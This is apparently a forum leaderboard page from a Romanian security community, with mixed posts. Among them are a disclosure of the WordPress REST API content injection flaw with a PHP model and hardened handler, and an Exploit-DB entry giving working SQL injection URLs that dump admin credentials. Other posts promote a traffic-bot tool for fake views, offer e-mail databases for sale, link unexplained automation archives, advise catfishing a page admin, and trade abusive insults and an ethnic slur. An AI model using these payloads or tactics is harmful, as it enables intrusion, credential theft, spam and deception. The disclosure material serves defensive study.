Leaderboard
Popular Content
Showing content with the highest reputation on 02/11/17 in all areas
-
Mosh
Remote terminal application that allows roaming, supports intermittent connectivity, and provides intelligent local echo and line editing of user keystrokes. Mosh is a replacement for SSH. It's more robust and responsive, especially over Wi-Fi, cellular, and long-distance links. Mosh is free software, available for GNU/Linux, BSD, macOS, Solaris, Android, Chrome, and iOS.
https://mosh.org/#getting
There is no client for Windows, but the Chrome app can be used - https://chrome.google.com/webstore/detail/mosh/ooiklbnjmhbcgemelgfhaeaocllobloj
It gets along well with tmux.
3 points
-
Syllabus
Section: Preliminary Skills - Prerequisites
Module 1 : Introduction
Module 2 : Networking
Module 3 : Web Applications
Module 4 : Penetration Testing
Section: Preliminary Skills - Programming
Module 1 : C++
Module 2 : Python
Section: Penetration Testing
Module 1 : Information Gathering
Module 2 : Footprinting & Scanning
Module 3 : Vulnerability Assessment
Module 4 : Web Attacks
Module 5 : System Attacks
Module 6 : Network Attacks
Invitation: https://www.elearnsecurity.com/affiliate/redeem?code=RYW-AIK
1 point
-
Dedicated servers at good prices.

Config 1:
Haswell Intel CPU Intel i5-4570 @ 3.2 Ghz 4 Core, 4 Threads, 6MB L2 Cache
16 GB DDR3 Memory
1 x 240 GB SSD Force 3 (6Gb/s, 85.000 IOPS)
Monthly traffic: 20 TB
Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month)
2 IP Addresses included with custom reverse DNS
Monthly cost: 60 euro
Setup fee: 65 euro

Config 2:
Haswell Intel CPU Intel i5-4570 @ 3.2 Ghz 4 Core, 4 Threads, 6MB L2 Cache
32 GB DDR3 Memory
2 x 240 GB SSD Force 3 (6Gb/s, 85.000 IOPS)
Monthly traffic: 20 TB
Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month)
2 IP Addresses included with custom reverse DNS
Monthly cost: 88 euro
Setup fee: 65 euro

Config 3:
Haswell Intel CPU Intel i7-4770 @ 3.4 Ghz 4 Core, 8 Threads, 6MB L2 Cache
32 GB DDR3 Memory
1 x 2 TB SATA3
Monthly traffic: 20 TB
Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month)
2 IP Addresses included with custom reverse DNS
Monthly cost: 110 euro
Setup fee: 65 euro

Config 4:
Haswell Intel CPU Intel i7-4770 @ 3.4 Ghz 4 Core, 8 Threads, 6MB L2 Cache
32 GB DDR3 Memory
2 x 240 GB SSD Force 3 (6Gb/s, 85.000 IOPS)
Raid 1 Hardware controller (Adaptec/3Ware)
Monthly traffic: 20 TB
Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month)
2 IP Addresses included with custom reverse DNS
Monthly cost: 130 euro
Setup fee: 65 euro

Config 5:
Haswell Intel CPU Xeon E3-1230 @ 3.2 Ghz 4 Core, 8 Threads, 8MB L2 Cache
16 GB DDR3 Memory
2 x 2TB eSATA Enterprise
Raid 1 Hardware controller (Adaptec/3Ware)
Monthly traffic: 20 TB
Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month)
2 IP Addresses included with custom reverse DNS
Monthly cost: 150 euro
Setup fee: 65 euro

Config 6:
Haswell Intel CPU Xeon E3-1230 @ 3.2 Ghz 4 Core, 8 Threads, 8MB L2 Cache
32 GB DDR3 Memory
4 x 2TB SATA3
Raid 10 Hardware controller (Adaptec/3Ware)
Monthly traffic: 20 TB
Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month)
2 IP Addresses included with custom reverse DNS
Monthly cost: 200 euro
Setup fee: 65 euro

Note:
- Bandwidth is guaranteed to any destination (EU/US/Asia) / We have private peerings with over 300 providers. For everything that is not peered, we go out through Level3, Cogent, Telia, Hurricane Electric and NTT. Also, on BGP we use Noction solutions (if there is loss on a route chosen by BGP, it switches to another one)
- Child porn/spam/scanning/phishing/fraud are not accepted
- Servers are activated approximately 3 days after payment is made
- The allocated IP addresses are from Germany.
- Payment can be made via PayPal.
- A contract can be drawn up if necessary.
- The prices above are final; no VAT or anything else is added to them.
- On request, apache, php, mysql, nginx can be installed on the servers. Initial tuning can also be done along with the installation. (no additional cost)
- Premium consulting and technical support for everything Linux-related. (both by phone and by email)
- Besides the servers listed, we have the whole HP range (from HP DL120 up to DL980), but clearly the costs are different there because they do not fall into the 'low end/cost' category
- For anyone who wants to re-rent the servers, we can collaborate and offer different prices. (we can discuss)
- OSes: Any Linux distribution, FreeBSD, NetBSD, OpenBSD, Solaris. At the moment we do not have Windows because it has a high licensing cost and we do not offer technical support for it ;-)

Those interested are asked to send a private message. If needed, I can call you personally to give you more details.

wget tests (without tcp tuning):

root@pluto:~# wget -O /dev/null http://cachefly.cachefly.net/100mb.test
--2013-12-15 20:55:24-- http://cachefly.cachefly.net/100mb.test
Resolving cachefly.cachefly.net (cachefly.cachefly.net)... 205.234.175.175
Connecting to cachefly.cachefly.net (cachefly.cachefly.net)|205.234.175.175|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `/dev/null'
100%[===============================>] 104,857,600 94.9M/s in 1.1s
2013-12-15 20:55:25 (94.9 MB/s) - `/dev/null' saved [104857600/104857600]

root@pluto:~# wget -O /dev/null http://mirror.de.leaseweb.net/speedtest/100mb.bin
--2013-12-15 20:56:13-- http://mirror.de.leaseweb.net/speedtest/100mb.bin
Resolving mirror.de.leaseweb.net (mirror.de.leaseweb.net)... 46.165.198.1, 2a00:c98:2010:1:1:face:d06:f00d
Connecting to mirror.de.leaseweb.net (mirror.de.leaseweb.net)|46.165.198.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 100000000 (95M) [application/octet-stream]
Saving to: `/dev/null'
100%[===============================>] 100,000,000 64.3M/s in 1.5s
2013-12-15 20:56:14 (64.3 MB/s) - `/dev/null' saved [100000000/100000000]

root@pluto:~# wget -O /dev/null http://mirror.leaseweb.com/speedtest/100mb.bin
--2013-12-15 20:56:20-- http://mirror.leaseweb.com/speedtest/100mb.bin
Resolving mirror.leaseweb.com (mirror.leaseweb.com)... 94.75.223.121, 2001:1af8:4030:1:0:dead:beef:cafe
Connecting to mirror.leaseweb.com (mirror.leaseweb.com)|94.75.223.121|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 100000000 (95M) [application/octet-stream]
Saving to: `/dev/null'
100%[===============================>] 100,000,000 78.0M/s in 1.2s
2013-12-15 20:56:22 (78.0 MB/s) - `/dev/null' saved [100000000/100000000]

root@pluto:~# wget -O /dev/null http://ftp.iasi.roedu.net/mirrors/centos.org/6.5/isos/x86_64/CentOS-6.5-x86_64-bin-DVD2.iso
--2014-01-28 00:30:34-- http://ftp.iasi.roedu.net/mirrors/centos.org/6.5/isos/x86_64/CentOS-6.5-x86_64-bin-DVD2.iso
Resolving ftp.iasi.roedu.net (ftp.iasi.roedu.net)... 81.180.250.146, 2001:b30:1::146
Connecting to ftp.iasi.roedu.net (ftp.iasi.roedu.net)|81.180.250.146|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1284395008 (1.2G) [application/octet-stream]
Saving to: `/dev/null'
43% [================================> ] 554,423,034 103M/s eta 9s ^C

root@pluto:~# wget -O /dev/null http://mirror.nl.leaseweb.net/speedtest/10000mb.bin -4
--2014-02-24 23:07:19-- http://mirror.nl.leaseweb.net/speedtest/10000mb.bin
Resolving mirror.nl.leaseweb.net (mirror.nl.leaseweb.net)... 94.75.223.121
Connecting to mirror.nl.leaseweb.net (mirror.nl.leaseweb.net)|94.75.223.121|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10000000000 (9.3G) [application/octet-stream]
Saving to: `/dev/null'
5% [====> ] 511,839,952 108M/s eta 91s ^C
root@pluto:~#

hdparm test on a server with SSD Force3:

root@ns:~# hdparm -t --direct /dev/sda1
/dev/sda1: Timing O_DIRECT disk reads: 284 MB in 0.56 seconds = 509.85 MB/sec
root@ns:~# hdparm -T /dev/sda1
/dev/sda1: Timing cached reads: 27844 MB in 2.00 seconds = 13940.39 MB/sec
root@ns:~#
1 point
-
Hi! I posted some time ago that I am working on a project and needed testers for the application. I think I have reached a version that is stable for now. (it can always be better...)

What does the application do?
- Opens links in Google Chrome (Simple, right? In practice it is harder)

How?
- With a customizable referrer (from facebook, google, youtube to whatever you want)
- With a random User-Agent (Firefox, Chrome, Opera, Safari and mobile devices)
- Window size (random)
- Mouse scroll on the page
- Click on a chosen element on the page
- Time of your choice (between 10 and 600 seconds)
- Search on Google / Youtube and click (Keyword promotion & SEO)
- Click on Youtube Play and Skip Ad (automatic)

Unique IPs from Romania?
- Yes, each user from Romania will view a link only once every 24 hours.

How much does it cost?
- It is free (it is a community, we help each other)

Requires:
- Java
- Google Chrome (recent version)

I made a tutorial (I hope it helps):

For RST members I offer support and bonuses. If you are interested, please contact me. I ask an administrator to check and confirm whether it is OK.
Link: https://video-seo.ro/
1 point
-
Relax, you really have nothing to ruin my business with, and I actually thank you for the questions you asked. My idea is as follows: someone sends me a PM interested in a certain quantity of e-mails, and after they buy, I will post here both the person who bought them and their number, so that the others who come know whether or not they have been sold up to that point. So I am not selling the same e-mails to everyone. I do not consider that I have an enormously large quantity, like 10-15 million, because I would be lying if I said that; I repeat, they are databases, they are not extracted with all kinds of extractors and all thrown together. The only sorting option is the one I specified; I cannot sort anything the way you said, because that would mean mixing them with one another, which I do not like.
1 point
-
io.kent is banned; his last post is from October 2014. Stop posting whenever you feel like it!
1 point
-
Come on, bro, put the date when you added them at the top, and it wouldn't hurt to say whether they are still valid.
1 point
-
Hi, I haven't posted in a long time but I have a big problem... An Instagram page is posting my and my friends' work (in short, it photographs our drawings and makes them public). I tried to talk to the guy in question but I got blocked on 5 accounts... About how many (real) people would I need to report him so that his account gets closed... (I should mention that the guy has 2k followers...) If anyone has an idea or can help me, I'll be in your debt; the guy is really making a mockery of our work!
1 point
-
Security Risk: Severe
Exploitation Level: Easy/Remote
DREAD Score: 9/10
Vulnerability: Privilege Escalation / Content Injection
Patched Version: 4.7.2

As part of a vulnerability research project for our Sucuri Firewall (WAF), we have been auditing multiple open source projects looking for security issues. While working on WordPress, we discovered a severe content injection (privilege escalation) vulnerability affecting the REST API. This vulnerability allows an unauthenticated user to modify the content of any post or page within a WordPress site.

We disclosed the vulnerability to the WordPress Security Team who handled it extremely well. They worked closely with us to coordinate the disclosure timeline and get as many hosts and security providers aware and patched before this became public.

A fix for this was silently included on version 4.7.2 along with other less severe issues. This was done intentionally to give everyone time to patch. We are now disclosing the details because we feel there has been enough time for most WordPress users to update their sites.

Are You At Risk?

This privilege escalation vulnerability affects the WordPress REST API that was recently added and enabled by default on WordPress 4.7.0.

One of these REST endpoints allows access (via the API) to view, edit, delete and create posts. Within this particular endpoint, a subtle bug allows visitors to edit any post on the site.

The REST API is enabled by default on all sites using WordPress 4.7.0 or 4.7.1. If your website is on these versions of WordPress then it is currently vulnerable to this bug.

Technical Details

Our journey begins in ./wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php

There are a couple of things to notice here. The registered route is designed to populate the ID request parameter with digits. For example, if you are sending a request to /wp-json/wp/v2/posts/1234 – the ID parameter would be set to 1234.

This behavior alone could be a good way to prevent attackers from crafting malicious ID values, but when looking at how the REST API manages access, we quickly discover that it prioritizes $_GET and $_POST values over the ones generated by the route’s regular expression. This makes it possible for an attacker to send a request like: /wp-json/wp/v2/posts/1234?id=12345helloworld – which would assign 12345helloworld to the ID parameter – which now contains more than just digits.

Investigating further, we had a look at the various callbacks (in the screenshot above) and one of them kept our attention: the update_item and its permission check method update_item_permissions_check.

In short, it passes our alphanumeric ID value directly to the get_post() function. This function validates the request by checking if the post actually exists and whether our user has permission to edit this post. We found this to be a curious way of sanitizing the request. If we send an ID that doesn’t have a corresponding post, we can just pass through the permission check and be allowed to continue executing requests to the update_item method!

Curious about what could cause get_post() to fail at finding a post (other than a non-existent ID), we realized it used the get_instance() static method in wp_posts to grab posts.

As you can see from the code, it would basically fail on any input that isn’t all made of numeric characters – so 123ABC would fail.

For an attacker, this means that WordPress (thinking it’s a user with enough privilege to edit this post) would run the update_item method.

We thought it would make sense to check what this method does.

There is a very subtle, yet important detail in that last screenshot – WordPress casts the ID parameter to an integer before passing it to get_post!

This is an issue because of the way PHP does type comparisons and conversions. For example, one can see that the following snippet would return 123:

This leads to a very dangerous situation where an attacker could submit a request like /wp-json/wp/v2/posts/123?id=456ABC to change the post whose ID is 456!

Due to this type-juggling issue, it is then possible for an attacker to change the content of any post or page on a victim’s site. From there, they can add plugin-specific shortcodes to exploit vulnerabilities (that would otherwise be restricted to contributor roles), infect the site content with an SEO spam campaign, or inject ads, etc. Depending on the plugins enabled on the site, even PHP code could be executed very easily.

SOURCE: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
1 point
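The permission-check fall-through and the integer cast described in the write-up above, reduced to a stand-alone PHP model next to a hardened handler. This is an added example, not WordPress or Sucuri code; the function names, the in-memory post table and the owner-based permission rule are assumptions made for illustration.

```php
<?php
// Simplified model, not WordPress code; hypothetical names, constructed sample data.
$posts = [
    123 => ['owner' => 'alice', 'content' => 'alice post'],
    456 => ['owner' => 'bob',   'content' => 'bob post'],
];

// Lookup that finds nothing unless the ID consists only of digits.
function lookup_post(array $posts, $id): ?array {
    $numeric = preg_match('/^[0-9]+$/', (string) $id) === 1;
    return $numeric ? ($posts[(int) $id] ?? null) : null;
}

// Flawed check: "post not found" falls through to "allowed".
function permission_check_flawed(array $posts, ?string $user, $id): bool {
    $post = lookup_post($posts, $id);
    if ($post !== null && $post['owner'] !== $user) {
        return false;
    }
    return true;
}

// Flawed update: casts the same raw value to int, so a digits-then-letters ID selects a real post.
function update_flawed(array &$posts, $id, string $content): bool {
    $id = (int) $id;
    if (!isset($posts[$id])) {
        return false;
    }
    $posts[$id]['content'] = $content;
    return true;
}

// Hardened handler: validate once, then use one canonical integer for lookup, check and write.
function update_hardened(array &$posts, ?string $user, $id, string $content): int {
    if (preg_match('/^[1-9][0-9]*$/', (string) $id) !== 1) {
        return 400; // reject anything that is not a plain positive integer
    }
    $id = (int) $id;
    if (!isset($posts[$id])) {
        return 404; // a missing post is an error, never an implicit "allowed"
    }
    if ($posts[$id]['owner'] !== $user) {
        return 403;
    }
    $posts[$id]['content'] = $content;
    return 200;
}

// The query-string value overrides the digits captured from the route, as the write-up describes.
$params = array_merge(['id' => '123'], ['id' => '456ABC']);
$copy = $posts; // run the flawed path on a copy so the hardened path sees clean data
var_dump(permission_check_flawed($copy, null, $params['id']), update_flawed($copy, $params['id'], 'changed'));
var_dump(update_hardened($posts, null, $params['id'], 'changed'));
```

The point to carry into code review is that the check and the write must operate on the same validated value; any handler that looks up a raw parameter for authorization and a cast parameter for the update has this shape.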
-
You trap the admin. You make yourself a girl's account, but one that looks as real as possible, a hottie, then you like a bunch of his posts, then you message him about how much you like his page, then you give him a few more likes, then you message him that you like the page a lot and you would like admin/editor etc. because you want to help him with the page. He gives you admin and then you will see who it is.... I'm tired
1 point
-
You whine like a pussy. If you're good, you don't give a damn about the rest. If you're a leech, of course you live in fear that someone better will come along. If you look a bit at the Jews, how they invest in young people and technology, in their education and discipline, in their start-ups, etc., you see how they piss all over Ro. Look at patents too, ffs. In 2015 Ro had 74 compared with Israel: 3804. Then from the rest of the years in total: Romania 483, Israel 35900. This is just an example, to make some of the anti-Semites around here burst. But look at other nations in Asia too and you see the same thing.
1 point
-
# # # # # #
# Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 07.02.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Demo: http://demos.nelliwinne.net/MySqlFileUpload/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/download.php?id=[SQL]&t=files
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files
# http://localhost/[PATH]/download.php?id=[SQL]&t=images_title
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title
# Etc....Other files have vulnerabilities ...
# # # # #
Source: https://www.exploit-db.com/exploits/41267/.
1 point
-
https://transfer.sh/KZc52/facebookautomation.rar
https://transfer.sh/J4Txm/gatherproxy.rar
https://transfer.sh/mhcYX/visitormaker.rar
Enjoy
1 point
-
Use:
You didn't have to tell us that you're a thug; the hair on my back stood up, sad little guy. First of all, you get nowhere with thuggery. I don't know how things work over there where you are, I think aelius knows (I think he lives around there); go to school, get into a math-informatics track/courses like they have over there, study and do the projects the teachers give you to do, otherwise you too will end up wiping the ass of some stinking German (that is if you're a kid, which I think you are). And if you're not a kid, and regarding your story that you work there, well, we start again from the statement that you're a thug, and if you were a thug in your youth too and didn't use your head, it's rather hard to get it going to learn something more in this field; I'm not saying it can't be done, but it takes desire and will (you can curse me, I don't mind). As for me, I pray for you that you didn't lie to us about your age; there is still a chance for you to make yourself a "cool" future, good luck.
1 point
-
AGSQ: Go fuck yourself, you mustachioed gypsy, together with your shitty SRL with 200 lei of share capital and a registered office in the middle of fucking nowhere, out in the fields where you don't even have sewerage. You're comparing a corporation with your shit of an SRL and 400 euros of monthly revenue? What do you mean, reused server? After the client uses the server for a month, do you throw it away? What the hell, is the server a condom? Piss off, you fucking loser, with your two-bit nonsense and comparisons.
1 point
This leaderboard is set to Bucharest/GMT+02:00